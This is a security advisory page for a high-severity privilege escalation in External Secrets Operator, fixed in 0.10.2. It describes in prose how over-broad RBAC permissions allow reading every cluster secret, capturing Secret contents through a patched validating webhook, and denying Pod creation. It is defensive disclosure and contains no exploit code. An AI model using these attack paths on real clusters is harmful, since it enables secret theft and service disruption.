GHSA-qwgc-rr35-h4x9

Suggest an improvement
Source
https://github.com/advisories/GHSA-qwgc-rr35-h4x9
Import Source
https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2024/09/GHSA-qwgc-rr35-h4x9/GHSA-qwgc-rr35-h4x9.json
JSON Data
https://api.osv.dev/v1/vulns/GHSA-qwgc-rr35-h4x9
Aliases
Published
2024-09-09T18:16:22Z
Modified
2024-09-18T18:44:47Z
Severity
  • 8.3 (High) CVSS_V3 - CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:L/A:H CVSS Calculator
  • 8.3 (High) CVSS_V4 - CVSS:4.0/AV:N/AC:L/AT:P/PR:N/UI:N/VC:H/VI:N/VA:H/SC:N/SI:N/SA:N CVSS Calculator
Summary
External Secrets Operator vulnerable to privilege escalation
Details

Details

The external-secrets has a deployment called default-external-secrets-cert-controller, which is bound with a same-name ClusterRole. This ClusterRole has "get/list" verbs of secrets resources(https://github.com/external-secrets/external-secrets/blob/main/deploy/charts/external-secrets/templates/cert-controller-rbac.yaml#L49). It also has path/update verb of validatingwebhookconfigurations resources(https://github.com/external-secrets/external-secrets/blob/main/deploy/charts/external-secrets/templates/cert-controller-rbac.yaml#L27). As a result, if a malicious user can access the worker node which has this deployment. he/she can: 1. For the "get/list secrets" permission, he/she can abuse the SA token of this deployment to retrieve or get ALL secrets in the whole cluster, including the cluster-admin secret if created. After that, he/she can abuse the cluster-admin secret to do whatever he/she likes to the whole cluster, resulting in a cluster-level privilege escalation.

  1. For the patch/update verb of validatingwebhookconfigurations, the malicious user can abuse these permissions to get sensitive data or lanuch DoS attacks:

For the privilege escalation attack, by updating/patching a Webhook to make it listen to Secret update operations, the attacker can capture and log all data from requests attempting to update Secrets. More specifically, when a Secret is updated, this Webhook sends the request data to the logging-service, which can then log the content of the Secret. This way, an attacker could indirectly gain access to the full contents of the Secret.

For the DoS attack, by updating/patching a Webhook, and making it deny all Pod create and update requests, the attacker can prevent any new Pods from being created or existing Pods from being updated, resulting in a Denial of Service (DoS) attack.

PoC

Please see the "Details" section

Impact

Privilege escalation

Database specific 
{
    "nvd_published_at": "2024-09-09T15:15:11Z",
    "cwe_ids": [
        "CWE-269",
        "CWE-732"
    ],
    "severity": "HIGH",
    "github_reviewed": true,
    "github_reviewed_at": "2024-09-09T18:16:22Z"
}
References

Affected packages

Go / github.com/external-secrets/external-secrets

Package

Name
github.com/external-secrets/external-secrets
View open source insights on deps.dev
Purl
pkg:golang/github.com/external-secrets/external-secrets

Affected ranges

Type
SEMVER
Events
Introduced
0Unknown introduced version / All previous versions are affected
Fixed
0.10.2